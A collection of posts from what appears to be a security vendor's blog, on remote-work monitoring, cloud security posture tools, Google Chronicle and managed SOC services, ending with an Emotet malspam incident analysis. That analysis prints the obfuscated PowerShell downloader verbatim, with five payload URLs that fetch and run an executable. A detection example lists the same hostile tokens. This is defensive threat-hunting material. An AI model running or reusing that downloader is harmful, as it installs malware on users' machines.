Cyberseer Annual Review

Published: 15th February

2020 was a year to remember for all the wrong reasons. Organisations were forced to immediately change to new ways of working and interacting with users and consumers.

In this report, Cyberseer reviews the issues of 2020:

  • Cloud Transformation
  • The Remote Workforce
  • Cybercrime
  • Supply Chain Security

During 2020, there was monumental change both within organisations and in how consumers interact with these organisations. Within this paper we review how you can secure the cloud and the remote workforce (those users connecting to the cloud), how cybercrime has taken advantage of COVID-19, and the increased number of attacks on supply chain security. Complete the short form below to gain access to the full report.

Request Cyberseer Annual Review

Latest blogs

Discoveries made by the Cyberseer SOC

Why is visibility so important in today’s new norm of remote working.

What are Cloud Security and Posture Management tools?

Securing the Cloud Infrastructure: Native vs Cloud Control

Google Chronicle: The forward-thinking solution for threat hunting

Covid-19 Dramatically Changes Cyber Security Forever

Published: 6th November

The pandemic has set huge challenges for organisations worldwide. Overnight, organisations have had to transform rapidly just to function, and the demand on digital infrastructures has skyrocketed. Some organisations kept continuity by shifting business entirely online, creating demand for virtual processes and remote collaboration on a scale we have never seen.

Cyberseer have compiled some observations to consider below:

Cyberseer Infographic - Covid 19 Dramatically Changes Cyber Security Forever

Lessons from Covid-19 have permanently changed society and to a lesser extent the way we think about cyber security. Our practices must evolve. By making the entire system easier to protect and manage, it is also much easier to recover.

By Elizabeth Gladen


Why is visibility so important in today’s new norm of remote working?

In the wake of COVID-19 we now have new breeds of remote workers. Businesses have always had a small proportion of remote workers; however, pre-COVID-19 these were normally field-based personnel connecting to specific corporate applications and resources via VPN.

Along with the mass migration of workers to home environments, shortfalls in corporate laptops, PCs and tablets with which to arm the expanded remote workforce mean organisations are relaxing remote working policies to allow the use of personal devices (BYOD), with varying security postures, to access a much broader set of internal corporate applications than ever before. Now, more than ever, it is essential that companies have the ability to identify malicious activity originating from their remote access channels.

The majority of organisations already had varying degrees of remote access monitoring in place. However, these organisations are finding that they have to rapidly scale up their remote access infrastructures to cater for the new normal. 

Rolling out functional SaaS services and VPN connectivity quickly often introduces multiple blind spots that existing solutions weren’t designed to address. This may be a result of using new technologies or simply that the vast increase in traffic has resulted in scaling issues with existing monitoring solutions.

When scaling out infrastructure and applications we need to ensure that we have visibility into these new environments as well as capacity within existing systems. We therefore need to review and ensure that we ingest the appropriate data sources to provide insight into these environments, and that we have the capacity to store the additional raw data.

Finally, it is essential that you have an efficient SOC to actively monitor and respond to an increase in alerts.

Watch our webinar to learn more about visibility and click here to learn how ASPECT from Cyberseer can increase your SOC performance and reduce costs.

Published: 8th July


What are Cloud Security and Posture Management tools?

Published 24th June 2020

In 2019 Gartner published their report which recommended that security leaders invest in cloud security and posture management tools. The aim of CSPM tools is to identify and remediate the risks of misconfiguration, mismanagement, and mistakes.


Over the past year more enterprises have started to focus on cloud security and understand that they need a dynamic cloud security solution, but are unsure what to look for in a tool.


Within the cloud security space, there are Cloud Access Security Brokers (CASBs), Cloud Workload Protection Platforms (CWPPs), and Cloud Security Posture Management (CSPM) tools. While these tools offer overlapping sets of capabilities, none of them provides all the capabilities required to do the job of the others.


A CASB is placed between the customer and the cloud service provider to enforce security, compliance, and governance policies for cloud applications. It focuses on SaaS security and gives visibility and control on the use of SaaS applications such as Office 365, Salesforce, etc.


A CWPP solution is primarily used to secure server workloads in public cloud IaaS environments. A CWPP commonly offers workload configuration and vulnerability management, network segmentation, workload behaviour monitoring, visibility, system integrity monitoring and container security risk mitigation.


CSPM tools were earlier referred to as Cloud Infrastructure Security Posture Assessment (CISPA) tools, when their capabilities were limited to reporting; today's CSPM tools are security management automation tools that also address misconfiguration issues.


With the increasing use of cloud services and the growing cloud security concerns, vulnerabilities must be reduced. Gartner has predicted that by 2022 most cloud security failures will be the result of an organisation's own mistake, i.e., misconfiguration in the cloud.


A single misconfiguration has the power to expose several thousands of systems and sensitive data to the public internet.

Misconfiguration

Most of the cloud security breaches that we read about in 2019 had one thing in common: misconfiguration. Some of the simplest misconfigurations exposed several hundred million personal records.

A misconfiguration occurs when computing assets are set up incorrectly, often leaving them vulnerable to malicious activity.

Benefits of CSPM

  • Automated security assessment, monitoring, reporting and management
  • Security best practice enforcement
  • Prevention of configuration vulnerabilities
  • Cloud asset inventory
  • Visibility into cloud usage and security events
  • Enforcement of prebuilt security standards and regulatory compliance

About C3M Cloud Control

C3M Cloud Control is a CSPM that also has some CWPP capabilities. The platform offers:

  • Cloud asset inventory
  • Automated cloud security assessment
  • Real-time alerting and reporting
  • Automated violation remediation
  • Security best practice enforcement
  • Compliance assurance with 8+ security standards and regulations
  • Third-party integrations such as Slack, Splunk, Jira, PagerDuty, ServiceNow, Amazon SNS, etc.
  • Identity and Access Management for cloud
  • CQL for querying the cloud infrastructure
  • Audit logs


Securing Cloud Infrastructure: Native vs Cloud Control

As the number of enterprises moving to the cloud grows exponentially, there has been an inevitable rise in cloud security breaches. Despite this rise, enterprises still fail to understand the need to implement a future-proof strategy for securing cloud infrastructure and to deploy a cloud security solution. At Cyberseer we find we need to educate our clients, as most organisations assume that:

  1. Cloud is secure by default so why would I use Cloud Control?
  2. I already have native security tools that my cloud service provider offers me, so why should I invest in a third-party tool?

Here we answer these two common questions which may seem fairly simple and straightforward on the surface:


Who is responsible for cloud security?

It is highly important that the enterprises adopting the cloud are familiar with the shared responsibility of security that is a standard across all the cloud providers. Cloud providers are responsible for security “of” the cloud while security “in” the cloud is the responsibility of the enterprise.


The cloud provider’s responsibilities can be summed up as follows:

  • Protecting the cloud provider’s physical premises, software, network, and hardware.
  • Server-level security i.e. protection against attacks that would affect the entire cloud server
  • Ensuring their systems are always updated and have the necessary patches in place
  • Providing business continuity services and contingencies in case of an accident or system failure

The customer is responsible for the following:

  • Ensuring systems are properly configured
  • Security of traffic coming in and out of the server
  • Maintenance and protection of all platforms and applications running on the cloud
  • Patching their OS and applications
  • Configuring their OS, databases, and applications
  • Managing and handling all matters related to login, authentication and access permissions
  • Protection of the data that enters and exits the cloud service
  • Controlling what data is loaded to the cloud and ensuring an appropriate level of encryption
  • Enforcing security best practices for the cloud

Image: C3M Cloud Control table of the shared responsibility model

The cloud provider protects the underlying infrastructure of the cloud from vulnerabilities, intrusions, fraud and abuse, and provides its customers with adequate security capabilities.

However, it is the customer's responsibility to ensure that they make the most of these security capabilities. For example, in the case of AWS it is the customer's responsibility to enforce the necessary access control policies using AWS IAM, configure Security Groups, enable CloudTrail, etc.
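To make both the "misconfiguration" discussion in the CSPM post above and the customer-side half of the shared responsibility list concrete, here is an added example of a minimal CSPM-style posture assessment with automated remediation. It is not C3M Cloud Control's code nor any cloud provider's API: the inventory shape, field names, rule names and the admin CIDR are assumptions constructed for the illustration, but the checks (admin port open to the internet, public unencrypted bucket, CloudTrail disabled, IAM user without MFA, stale access key) are the kind of items the lists above describe.

```python
"""Added example (not C3M Cloud Control's or any provider's code): a minimal
CSPM-style posture assessment over a constructed cloud inventory, covering the
customer-side items from the shared responsibility list (security groups, IAM,
CloudTrail, data exposure). Field names and rule names are assumptions."""
import copy
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed inventory in a hypothetical normalised shape; a real CSPM tool
# would build this from the provider's APIs.
INVENTORY: Dict = {
    "security_groups": [
        {"id": "sg-web", "rules": [{"port": 443, "cidr": "0.0.0.0/0"}]},
        {"id": "sg-admin", "rules": [{"port": 22, "cidr": "0.0.0.0/0"}]},
    ],
    "buckets": [
        {"name": "public-assets", "public": True, "encrypted": True},
        {"name": "customer-exports", "public": True, "encrypted": False},
    ],
    "iam_users": [
        {"name": "alice", "mfa": True, "key_age_days": 30},
        {"name": "svc-legacy", "mfa": False, "key_age_days": 400},
    ],
    "cloudtrail": {"enabled": False, "multi_region": False},
}

ADMIN_PORTS = {22, 3389}
CORP_ADMIN_CIDR = "203.0.113.0/24"  # constructed placeholder for the admin network

@dataclass(frozen=True)
class Finding:
    rule: str
    resource: str
    severity: str

@dataclass
class Rule:
    name: str
    severity: str
    check: Callable[[Dict], List[str]]  # returns ids of violating resources

def open_admin_ports(inv):
    return [sg["id"] for sg in inv["security_groups"]
            if any(r["port"] in ADMIN_PORTS and r["cidr"] == "0.0.0.0/0"
                   for r in sg["rules"])]

def public_unencrypted_buckets(inv):
    return [b["name"] for b in inv["buckets"] if b["public"] and not b["encrypted"]]

def users_without_mfa(inv):
    return [u["name"] for u in inv["iam_users"] if not u["mfa"]]

def stale_access_keys(inv, max_age_days=90):
    return [u["name"] for u in inv["iam_users"] if u["key_age_days"] > max_age_days]

def cloudtrail_disabled(inv):
    return [] if inv["cloudtrail"]["enabled"] else ["cloudtrail"]

RULES = [
    Rule("admin-port-open-to-internet", "high", open_admin_ports),
    Rule("public-bucket-unencrypted", "high", public_unencrypted_buckets),
    Rule("cloudtrail-not-enabled", "high", cloudtrail_disabled),
    Rule("iam-user-no-mfa", "medium", users_without_mfa),
    Rule("access-key-older-than-90d", "medium", stale_access_keys),
]

def assess(inv, rules=RULES):
    """Run every rule and collect findings (the assessment and reporting step)."""
    return [Finding(rule.name, res, rule.severity)
            for rule in rules for res in rule.check(inv)]

def remediate(inv, findings):
    """Automated remediation for the two rules that are safe to fix mechanically.
    Returns a corrected copy plus the findings it fixed; findings that need a
    human decision (MFA, key rotation, bucket exposure) are left in the report."""
    fixed = copy.deepcopy(inv)
    done = []
    for f in findings:
        if f.rule == "cloudtrail-not-enabled":
            fixed["cloudtrail"]["enabled"] = True
            done.append(f)
        elif f.rule == "admin-port-open-to-internet":
            for sg in fixed["security_groups"]:
                if sg["id"] == f.resource:
                    for r in sg["rules"]:
                        if r["port"] in ADMIN_PORTS and r["cidr"] == "0.0.0.0/0":
                            r["cidr"] = CORP_ADMIN_CIDR  # restrict, do not delete
            done.append(f)
    return fixed, done

if __name__ == "__main__":
    before = assess(INVENTORY)
    after_inv, fixed = remediate(INVENTORY, before)
    for f in before:
        print(f"[{f.severity}] {f.rule}: {f.resource}")
    print(f"auto-fixed {len(fixed)}; remaining {len(assess(after_inv))}")
```

The split between `assess` and `remediate` mirrors the difference the CSPM post draws between the older report-only CISPA tools and current tools that fix misconfigurations: only findings with an unambiguous safe fix are remediated automatically, and the admin rule is narrowed to a known range rather than deleted so that legitimate access is not cut off.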

What about native tools?

Cloud service providers all offer their own native security tools that can easily be configured and deployed. These tools normally reside within the same console as the infrastructure services and hence the tool can be easily used.

For organisations with very minimal security aspirations, such tools work well. However, for an organisation that has greater security requirements or operates in a regulated industry, such tools are not sufficient.

Cloud providers' native tools do not offer the depth of coverage that Cloud Control offers. What's more, they are not portable across clouds, so a separate interface and configuration per cloud provider is required. By using Cloud Control, a consistent policy can be rolled out across multiple cloud providers using a single interface.

Below is a comparison between the native security tools offered by the cloud service providers and Cloud Control.

Image: table of native tools vs Cloud Control

If you would like to know more about any of our services then please get in touch with us.

Published 23rd June

Google Chronicle: The forward-thinking solution for threat hunting

Chronicle is a new threat hunting platform, developed by Google. Leveraging Google Cloud and threat feed technologies, it gives analysts the ability to deep dive into accessible and enriched logs.

It gives companies 12 months of hot storage with sub-second searchability. It gives Google Search to the security industry. Basic SOC queries such as "How many devices accessed this IP address in the past 12 months?" can now be answered in a snap of your fingers, and this is something the cybersecurity industry hasn't really seen before.

Nowhere to hide for malicious actors

While that is a feat in itself Chronicle takes this further; it takes IOC (Indicator of Compromise) feeds from multiple sources (including Government agencies and VirusTotal) and can apply this to data it ingests.

All ingested data gets indexed so Chronicle will automatically retro-search the indexed data every time it sees a new IOC.

This means there’s truly nowhere to hide for malicious actors; the moment they are on the radar an analyst can quickly pivot off this information to provide a detailed timeline of when an environment became first infected and all the other devices involved.

This provides you 100% coverage against those 'low and slow' types of infection. Chronicle presents this data in such a way that the analyst gets a comprehensive view of what happened before and after, from all log sources ingested into the platform.
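The "index everything, then retro-search on every new IOC" behaviour described above is easy to sketch. The following is an added example, not Chronicle's code: an in-memory indexed store that answers the "how many devices accessed this IP in the past N days" query, matches new events forward against known IOCs, and sweeps the whole index backwards when a feed supplies a new indicator, producing the first-seen device and the full set of devices involved. The event shape, field names and all indicator values are constructed for the illustration.

```python
"""Added example, not Chronicle's code: an in-memory sketch of 'index every
event, then retro-search the index whenever a new IOC arrives'. The event
shape (timestamp, device, event type, indicator) and the indicator values are
constructed for this illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, already-normalised events; a real pipeline would first map raw
# DNS, proxy and EDR logs into one schema (Chronicle's is called UDM).
RAW_EVENTS = [
    ("2020-01-14T09:02:11Z", "laptop-17", "dns", "updates.example.net"),
    ("2020-01-14T09:02:12Z", "laptop-17", "http", "198.51.100.23"),
    ("2020-03-03T22:41:05Z", "laptop-17", "http", "198.51.100.23"),
    ("2020-03-04T03:10:40Z", "srv-fin-02", "dns", "updates.example.net"),
    ("2020-03-04T03:10:41Z", "srv-fin-02", "http", "198.51.100.23"),
    ("2020-05-20T12:00:00Z", "laptop-04", "http", "192.0.2.77"),
]

def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")

class IndexedLogStore:
    def __init__(self):
        self.by_indicator = defaultdict(list)  # indicator -> [(ts, device, type)]
        self.iocs = {}                         # indicator -> feed that supplied it

    def ingest(self, ts, device, event_type, indicator):
        """Index one event; returns True if it matches an IOC already known
        (the forward match). Historical matches are handled in add_ioc."""
        self.by_indicator[indicator].append((ts, device, event_type))
        return indicator in self.iocs

    def retro_search(self, indicator):
        # ISO-8601 strings sort chronologically, so a plain sort orders by time.
        return sorted(self.by_indicator.get(indicator, []))

    def add_ioc(self, indicator, feed):
        """Register a new IOC and immediately sweep the whole index for it."""
        self.iocs[indicator] = feed
        return self.retro_search(indicator)

    def devices_accessing(self, indicator, days, now_ts):
        """The 'how many devices accessed this IP in the past N days' query."""
        cutoff = parse_ts(now_ts) - timedelta(days=days)
        return sorted({dev for ts, dev, _ in self.by_indicator.get(indicator, [])
                       if parse_ts(ts) >= cutoff})

    def infection_timeline(self, indicator):
        """First-seen device and time, plus every device involved since."""
        hits = self.retro_search(indicator)
        if not hits:
            return None
        first_ts, first_dev, _ = hits[0]
        return {"first_seen": first_ts, "patient_zero": first_dev,
                "devices": sorted({dev for _, dev, _ in hits})}

def build_store(events=RAW_EVENTS):
    store = IndexedLogStore()
    for ev in events:
        store.ingest(*ev)
    return store

if __name__ == "__main__":
    store = build_store()
    # A feed publishes the indicator months after the first contact.
    hits = store.add_ioc("198.51.100.23", "constructed-feed")
    print(f"{len(hits)} historical hits")
    print(store.infection_timeline("198.51.100.23"))
    print(store.devices_accessing("198.51.100.23", 365, "2020-06-01T00:00:00Z"))
```

The point of the retro-search is in `add_ioc`: because every event was indexed on ingestion, a newly published indicator is matched against the full retention window in one lookup, which is what turns a "low and slow" beacon from January into a finding the day the feed catches up.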

Well thought out visualisation of this data makes it easy to identify interesting patterns of behaviours:

Chronicle Demo

In the screenshot above it's clear to see this in action. In one simple view, we can see a rare domain, the process that interacted with it and then clear beaconing activity, streamlining the analyst workflow. As for what data can be consumed by the platform, Chronicle made it clear that it just needs to be a security-related log.

All Chronicle needs to do is index the data and if it can’t do that straight away the Chronicle team will support the end user to get their data ingested on to the platform. This functionality is then added to the product, meaning everybody gets the benefit. Even in its infancy Chronicle can take in DHCP, DNS, Proxy and EDR.

The impressive speed allows analysts to search petabytes of data in seconds. The impressiveness isn’t just limited to data search but extends to the ingestion too as Chronicle can rapidly scale out dynamically across Google’s existing cloud platform. Log collection is simple too, adopting a containerised approach with multiple ingestion methods. 

On a techie front, Chronicle is solving ingestion issues commonly seen in SIEM projects by use of UDM (Unified Data Model). This is a predefined list of Chronicle fields to help Chronicle best understand the different data types it's ingesting. Having such clearly standardised fields for ingested data has allowed Chronicle to work hard on its biggest playing card: YARA-L.

YARA-L … and why we’re excited!

'YARA' may be a term familiar to the security community. It's a known standard for writing detection rules in. The key word here is community. Understanding the rule syntax and not having to learn anything new means that SOC teams and MSSPs will be able to put effective detection rules straight in with very little modification. Chronicle has taken this one step further by actively working with the security community to provide conversion tools from other rule formats.

Why is this important? A community rule to identify a new zero-day attack could be applied in a matter of minutes. You then only need to add a couple of seconds to this to search your past 12 months of data for any indicators of compromise. Streamlining at a new level.

Familiar syntax for rules also covers the other SIEM problem … noise. This makes it easier for an analyst to change conditions of rules so that there is more accurate detection within rules. Chronicle are constantly improving the syntax too, with planned additions for device lists within rules, and different network groups. This could be great for those devices that you want extra insight and monitoring of.

While we’re talking security, if you’ve already got existing solutions, Chronicle can also consume feeds from these giving businesses the freedom to migrate to the cloud or augment with their existing SIEMs.

What does this mean?

12 months minimum retention, sub-second query responses across entire log data sets, and clean, informative presentation of data with all associated contextual data on hand. All scalable and readily available in the cloud.

De-stress your security staff with an advanced SOC

Published: 9th February 2020

Many factors affect the ability of an organisation to remain secure, including an exponential increase in log data due to the adoption of cloud operating models, endpoint monitoring and more reliance being placed on online applications.

The need to ensure that your team are fully up to date on the latest threat hunting techniques, cyber exploits and vulnerabilities is critical.

To help put this challenge into perspective; it’s been estimated that 90% of all log data globally was generated within the last 24 months.

Utilising this log data effectively to your advantage and identifying malicious activity early is your biggest challenge and best defence against a damaging cyber-attack.

Cyberseer utilises machine learning technologies from leading security vendors combined with automation and orchestration from Cyberseer's ASPECT platform (Automated Security Platform Enriching Cyber Threats).

ASPECT enhances and contextualises the data and alerts raised by monitored devices.

To achieve this, ASPECT continually automates and orchestrates security data to provide an enriched, contextualised view of security alerts and associated intelligence, which enables our analysts to quickly identify and manage threats for your organisation.

The utilisation of ASPECT and our dedicated forensic analysts ensures that, as greater reliance on cloud technologies and disparate operating models becomes more complex, the increased data volumes generated as a result don’t create gaps in visibility.

8 Reasons for Detecting & Investigating Security Incidents with a Managed Security Service Provider

The threat landscape is continually evolving and affects all types of business that embrace and rely on technology for their day-to-day operations.


The explosion of cloud-based applications and services, coupled with initiatives such as Bring Your Own Device (BYOD), presents significant security challenges to the IT security department and keeps many CISOs awake at night.

The graphic below has never been more accurate than in today's digital, always-on world.

Image: Sleeping positions of CEO, CIO, COO and CISO

What are the concerns that contribute to making the role of a CISO almost untenable?

  • Increase in disparate log sources that make it challenging for some Analysts to see beyond the noise;
  • Inability to utilise effective contextual enrichment and situational awareness of the current climate;
  • Incomplete enterprise visibility with partial monitoring coverage across some areas;
  • A weak approach to threat hunting to surface anomalous activity earlier in its lifecycle;

Here are 8 critical reasons why utilising an MSSP can empower your security operations with the people, processes and technology required to take control and reduce dwell time to a minimum for your organisation.

Help ensure your CISO gets some rest and you don't suffer the consequences of a damaging cyber breach:

1. RISING COST OF BREACHES

£2.7 million is the average cost of a data breach (Ponemon Institute, 2017 Cost of Data Breach Study).

Immediate disruption is significant! Nearly one-third of data breaches suffered by companies around the world have resulted in someone losing their job, according to a 2018 Kaspersky Lab study.

Not to mention the reputational damage, loss of competitive advantage, erosion of customer confidence, plus higher insurance premiums and regulatory fines.

With rising costs of a cyber-attack, it’s now a boardroom concern.

Utilising an MSSP to proactively monitor your enterprise can help thwart and thus significantly reduce the impact of any attacks targeting your enterprise, be it from internal or external sources.

2. GDPR IMPLICATIONS

GDPR in numbers. The maximum penalty

With the introduction of the EU’s General Data Protection Regulation (GDPR), it’s vital for businesses to pay even closer attention to their data protection strategies.

Organisations are at risk of significant fines if they fail to demonstrate appropriate controls and/or fail to report security breaches to a relevant authority within 72 hours.

To execute notifications of data breaches, organisations must invest in a holistic cybersecurity program.

 The need for improved visibility of data and capability to detect, respond and report breaches is now greater than ever.

An MSSP enables your organisation to align with the control mandates within GDPR and ensure that the risk of financial penalties is reduced significantly.

3. PROTECTING AGAINST MALWARE

over a third of identified breaches are reported to involve malware

It’s important for appropriate controls, such as behaviour-based security solutions to be deployed to accurately detect and respond to attacks before they cause significant damage to your assets and affect your reputation.

Cyberseer utilises behaviour-based endpoint monitoring technology and machine learning to surface anomalous activity swiftly.

4. IMPROVED MONITORING, DETECTION AND RESPONDING TO THREATS

Government research shows that 32% of businesses have experienced a cybersecurity attack in the last 12 months.

(Department for Digital, Culture, Media and Sport, Cyber Security Breaches Survey 2019: Statistical Release).

The threat of a cyber-attack is widespread and real in the UK. It’s now a case of when not if you’ll be targeted. Cybersecurity and how to protect the business are a priority issue.

Cyberseer can challenge and improve your security strategy, protecting your organisation’s assets, customer data and third-parties’ integrations from compromise.

5. MANAGE CLOUD SECURITY

As more and more organisations adopt software as a service and cloud-first initiatives, attackers are following the data.

As a result, attacks against cloud providers, telecoms, and other organisations with access to large amounts of data have increased.

Cyberseer solutions incorporate log data from your cloud deployments/applications and profile this data alongside your traditional on-premise log data ensuring that complete visibility of your enterprise end to end is achieved irrespective of its location.

6. IT’S BEEN CHALLENGING FOR YOU TO FIND & RETAIN TALENT.

Recent reports estimate that by 2021, a staggering 3.5 million cybersecurity jobs will be available (Cybersecurity Ventures, Cybersecurity Job Report 2018-2021).

There is a critical talent shortage, and this alone can be a challenge. With a current cybersecurity skills shortage of 2.9 million employees, it’s no wonder that cybersecurity salaries continue to rise.

Utilising an MSSP can help to reduce the operational risk as well as ensure an unfilled vacancy doesn’t affect your front-line defences.

Cyberseer’s approach involves hiring and retaining Tier 3 Forensic Analysts as part of our managed security service team.

7. DECREASE UNNECESSARY COSTS & WASTE WHILST INCREASING EFFICIENCY.

Modern cybersecurity programs are costly to build. It can be expensive to invest in the best-in-class cybersecurity tools alongside costs for the training required for staff to use the new tools.

MSSPs enable organisations to replace the large capital expenditure associated with this investment with predictable, fixed ongoing operational costs.

Cyberseer adopts a ‘do more with less’ approach utilising next-generation technologies to reduce alert fatigue whilst embracing industry leading forensic analysts to threat hunt, triage and investigate; all encapsulated within an easy to understand user-based license model inclusive of unlimited logging.

8. LACK OF RESOURCES TO MONITOR YOUR SECURITY AT ALL HOURS.

Providing the capability to effectively monitor your enterprise around the clock can become a costly exercise. As a result, many organisations have given up on this in favour of a 9x5 approach to monitoring.

This presents a potential security gap, as adversaries can attack at any time and are not considerate of your active monitoring hours.

Cyberseer provides a 24 x 7 priority threat alerting service as part of the deployed capability.

This service autonomously notifies our analysts of anomalous activity and the Cyberseer enrichment engine starts building up threat intelligence information against individual events within the user or entity timeline to save the analyst time collecting and verifying the data.

This greatly improves the ‘Time to Respond’ (TTR) metrics as well as controlling the volume of human effort that’s required to triage each threat with the same level of accuracy.

PARTNERING WITH AN MSSP LIKE CYBERSEER DELIVERS THE FOLLOWING BENEFITS:

  • Superior protection:
    • access to the brightest minds and security expertise;
    • 24/7 threat monitoring and alerting;
    • access to best-in-class cybersecurity technology.
  • Focus on your business;
  • Cost savings;
  • Peace of mind;
  • A virtual extension of your IT security team, on hand to support you.


Detect Emotet Malspam

Introduction to Emotet Malspam

Recently, one of Cyberseer's customers was hit with a "Malspam" campaign aiming to plant the Emotet malware within its network.

The original e-mail was sent to a distribution group which quickly escalated the situation. As this was a new campaign for that day, the client’s e-mail gateway had no matching signatures and allowed the malicious e-mail to end up in a number of users’ inboxes.

What is Emotet?

Emotet accounted for 57% of all banking trojan payloads in Q1 2018 [1] with a steady number of infections and daily new campaigns throughout the year. First reported in 2014 as a banking trojan, Emotet has evolved into a malware delivery botnet that takes advantage of social engineering techniques to compromise a machine. 

Infection usually begins with a user being sent a phishing e-mail containing a malicious Word document or a link to a malicious URL. 

Upon opening the malicious document, a combination of obfuscated VBA scripts / macros instructs the target machine to download a remote payload consisting of a number of different modules.


Figure 1 – Emotet Activity [2]

Previously downloaded payloads have included:

  • Banking infostealer – Intercepts network traffic from the browser to steal banking details entered by the user.
  • Email client infostealer – Steals e-mail credentials from email client software.
  • Browser infostealer – Steals information stored in browsers such as browsing history and saved passwords.
  • PST infostealer – Reads through Outlook’s message archives and extracts the sender names and e-mail addresses of the messages.

Detection of Emotet


Figure 2 – Emotet Infection Chain [3]

With the first stage of the attack involving an e-mail attachment, it makes sense to start by analysing the Word document that landed in the victims' inboxes.

As stated in the previous section, when a user opens the document and enables macros, a VBA script runs, and we then see the following PowerShell command being run to pull files from remote locations:

powershell.exe powershell $fbq=’IkL’;$qdr=‘https://danzarspiritandtruth.com/J7B5TiAIp@https://littlepeonyphotos.ru/jPGDyvIm@https://iuyouth.hcmiu.edu.vn/mVayv0I7S@https://exploraverde.co/mmR4TaGu8@https://turkaline.com/zGiFH0X‘.Split(‘@’);$siF=([System.IO.Path]::GetTempPath()+’\zEl.exe’);$wjS =New-Object -com ‘msxml2.xmlhttp’;$TMS = New-Object -com ‘adodb.stream’;foreach($PJC in $qdr){try{$wjS.open(‘GET’,$PJC,0);$wjS.send();$TMS.open();$TMS.type = 1;$TMS.write($wjS.responseBody);$TMS.savetofile($siF);Start-Process $siF;break}catch{}}

The command contains 5 hardcoded URLs serving a number of different payloads. Connections to these URLs were how the incident was first identified by Cyberseer analysts.

As soon as the URLs were connected to, signatureless models first breached for the connections to the domains and then for the download of the payload. Taking a step back, these external connections were 100% anomalous for this network environment.


Figure 3 – Initial connections

Pivoting into the network logs, a quick investigation of the external domains reveals that 5 users had become victims of this attack:


Figure 4 – Devices associated

Drilling deeper into the connections from one of the associated devices and looking at a PCAP we can confirm the download of the malicious payloads:


Figure 5 – Executable seen in PCAP

Carving the payloads from the PCAP we get the following exe files –

  • MD5 dd975e74625cdd2959005dc9043f4c26 – https://www.virustotal.com/#/file/44504663abd7b411dbd53a5175e71643acac03d85acb0d1c366819925d4aca97/detection
  • MD5 9a2c288270459e95d915b8eaee7f65da – https://www.virustotal.com/#/file/e426afe7129b3e68256b57e62a6e4b76f89a3d7726fba2a99752fce7b8acafad/detection

Cyberseer Analysts were able to rapidly investigate the file and contact the client. Luckily the downloaded executables were unable to execute due to permissions, allowing for them to be successfully quarantined and remediated before a further compromise could occur.
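The downloader command quoted above has a recognisable structure that an analyst can key on in process-creation telemetry: PowerShell spawned by Word, a COM HTTP client (`msxml2.xmlhttp`) writing a COM stream (`adodb.stream`) into the temp directory, and `Start-Process` on the result. The following is an added example, not code from the original post: detection logic over constructed process-creation events that scores those tokens, extracts the hard-coded URL list and the drop path from the `.Split('@')` construct, and checks a carved file's MD5 against the two hashes listed above. The sample command line keeps the structure of the one in the post but uses placeholder `.invalid` domains, and the host/user/parent field names are assumptions.

```python
"""Added example, not from the original post: detection logic for the
downloader pattern shown above, run over constructed process-creation events,
plus a hash check against the two MD5s the post lists. The sample command line
keeps the structure of the one in the post but uses placeholder .invalid
domains; host/user/parent field names are assumptions."""
import hashlib
import re

# Constructed process-creation events (sanitised; not the campaign's real domains).
SAMPLE_EVENTS = [
    {"host": "ws-042", "user": "jdoe", "parent": "WINWORD.EXE",
     "cmdline": ("powershell.exe powershell $a='x';"
                 "$u='https://placeholder-a.invalid/J7B5@https://placeholder-b.invalid/jPGD@"
                 "https://placeholder-c.invalid/mVay'.Split('@');"
                 "$f=([System.IO.Path]::GetTempPath()+'\\zEl.exe');"
                 "$w=New-Object -com 'msxml2.xmlhttp';$s=New-Object -com 'adodb.stream';"
                 "foreach($p in $u){try{$w.open('GET',$p,0);$w.send();$s.open();$s.type=1;"
                 "$s.write($w.responseBody);$s.savetofile($f);Start-Process $f;break}catch{}}")},
    {"host": "ws-007", "user": "admin", "parent": "explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# Tokens that together characterise the downloader: COM HTTP client plus a COM
# stream written to the temp directory and then executed. Compared lower-case.
INDICATORS = ["msxml2.xmlhttp", "adodb.stream", "gettemppath", "savetofile",
              "start-process", ".split('@')"]
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
URL_RE = re.compile(r"https?://[^'\"@\s]+")
DROP_RE = re.compile(r"GetTempPath\(\)\+'([^']+)'")

# MD5s of the carved executables, as listed in the post.
KNOWN_MD5 = {"dd975e74625cdd2959005dc9043f4c26", "9a2c288270459e95d915b8eaee7f65da"}

def score_event(ev):
    cmd = ev["cmdline"].lower()
    matched = [tok for tok in INDICATORS if tok in cmd]
    score = len(matched)
    # Office spawning PowerShell is itself a strong macro-abuse signal.
    if ev["parent"].upper() in OFFICE_PARENTS and "powershell" in cmd:
        score += 2
    return score, matched

def extract_urls(cmdline):
    """Pull the hard-coded download URLs out of the '@'-joined string."""
    return URL_RE.findall(cmdline)

def drop_path(cmdline):
    """File name appended to GetTempPath(), i.e. where the payload lands."""
    m = DROP_RE.search(cmdline)
    return m.group(1) if m else None

def detect(events, threshold=4):
    alerts = []
    for ev in events:
        score, matched = score_event(ev)
        if score >= threshold:
            alerts.append({"host": ev["host"], "user": ev["user"], "score": score,
                           "matched": matched, "urls": extract_urls(ev["cmdline"]),
                           "drop": drop_path(ev["cmdline"])})
    return alerts

def check_carved_file(data):
    """Hash a carved payload and compare with the post's IoCs."""
    md5 = hashlib.md5(data).hexdigest()
    return md5, md5 in KNOWN_MD5

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
    print(check_carved_file(b"constructed placeholder bytes"))
```

The extracted URL list is what lets the network-side pivot described above happen quickly: each URL's host becomes a search term across proxy and DNS logs to enumerate the other devices that reached it, and the drop path gives the endpoint team a concrete artefact to look for. The hash check is deliberately the weaker of the two signals, which is the post's point: a new campaign's payload hashes are not yet on any list, whereas the command-line structure and the anomalous external connections are visible immediately.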

Conclusion

This scenario highlights how traditional signature-based approaches are not enough to adequately defend a network against constantly evolving, new unknown threats. A machine-learnt behavioural approach to security is able to detect threats ahead of other traditional solutions, allowing a faster response to potential breaches. 

Security technologies that require signatures and blacklists to be updated will always be one step behind the attackers and never be able to detect new unknown threats in real-time.

Cyberseer's threat detection and analysis managed security service bridges the gaps in an organisation's cyber defence system. Having the ability to detect and understand the severity of internal and external threats provides effective threat mitigation.

Understanding your organisation’s threat score and dealing with live issues early, decreases incident response times and significantly reduces the risk of cyber damage.